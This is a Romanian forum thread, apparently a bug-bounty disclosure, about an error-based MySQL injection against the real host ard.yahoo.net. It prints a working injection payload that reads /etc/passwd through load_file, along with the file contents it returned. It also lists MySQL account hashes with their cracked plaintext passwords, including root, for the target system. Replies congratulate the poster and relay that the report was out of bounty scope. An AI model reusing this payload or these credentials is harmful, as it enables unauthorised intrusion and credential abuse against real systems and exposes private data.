[SQLI] ard.yahoo.net

dancezar · July 18, 2014

Target: ard.yahoo.net

Exploit: Mysql injection error based

Metod: POST

P.O.C 1#

http://s30.postimg.org/o922i33en/SQLi_Version.jpg

P.O.C 2#

http://s29.postimg.org/7qcy35o9x/root.jpg



root*FBC29A1C04A33DD6F834D6C4F7B19600CD9A78CD: zaq1zaq1
zqgame_com*E2EF6EF6136DB3CB73A1B7C5588BD09CF8602894: 1qaz1qaz
Parole pentru mysql dictionary based:))

File_Priv era Y deci se puteau citi fisiere , dar nu si scrie din cauza acelui slash \ chiar daca bagai ' sau ".



' or 1 group by concat(mid(load_file('/etc/passwd'),1,64),floor(rand(0)*2)) having min(0) or 1#

(Duplicate entry 'root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin' for key 'group_key')

Ciudat este ca eroarea aparea chiar daca bagai ' sau \u0027 sau \x27 .

Eroarea a fost descoperita de @akkiliON , iar eu am reusit sa o exploatez.Vulnerabilitatea a fost triaged si cel mai probabil daca vom primi bani vom imparti recompensa.

Edited July 18, 2014 by danyweb09

pr0fw3b · July 18, 2014

Felicitari

Open · July 18, 2014

Ce tine de yahoo.net nu prea ofera recompensa, tin minte ca au fost unii care au urcat si shell in yahoo.net si nu au primit nimic, eu va tin pumnii sa luati cat mai mult.

akkiliON · September 1, 2014

This report is not eligible for a bounty because it is not within the scope for an award. However, the report is still considered when calculating your overall rank in the Hall of Fame.

Sign In

[SQLI] ard.yahoo.net

Recommended Posts

dancezar

pr0fw3b

Open

akkiliON

Join the conversation

Browse

Activity

Pages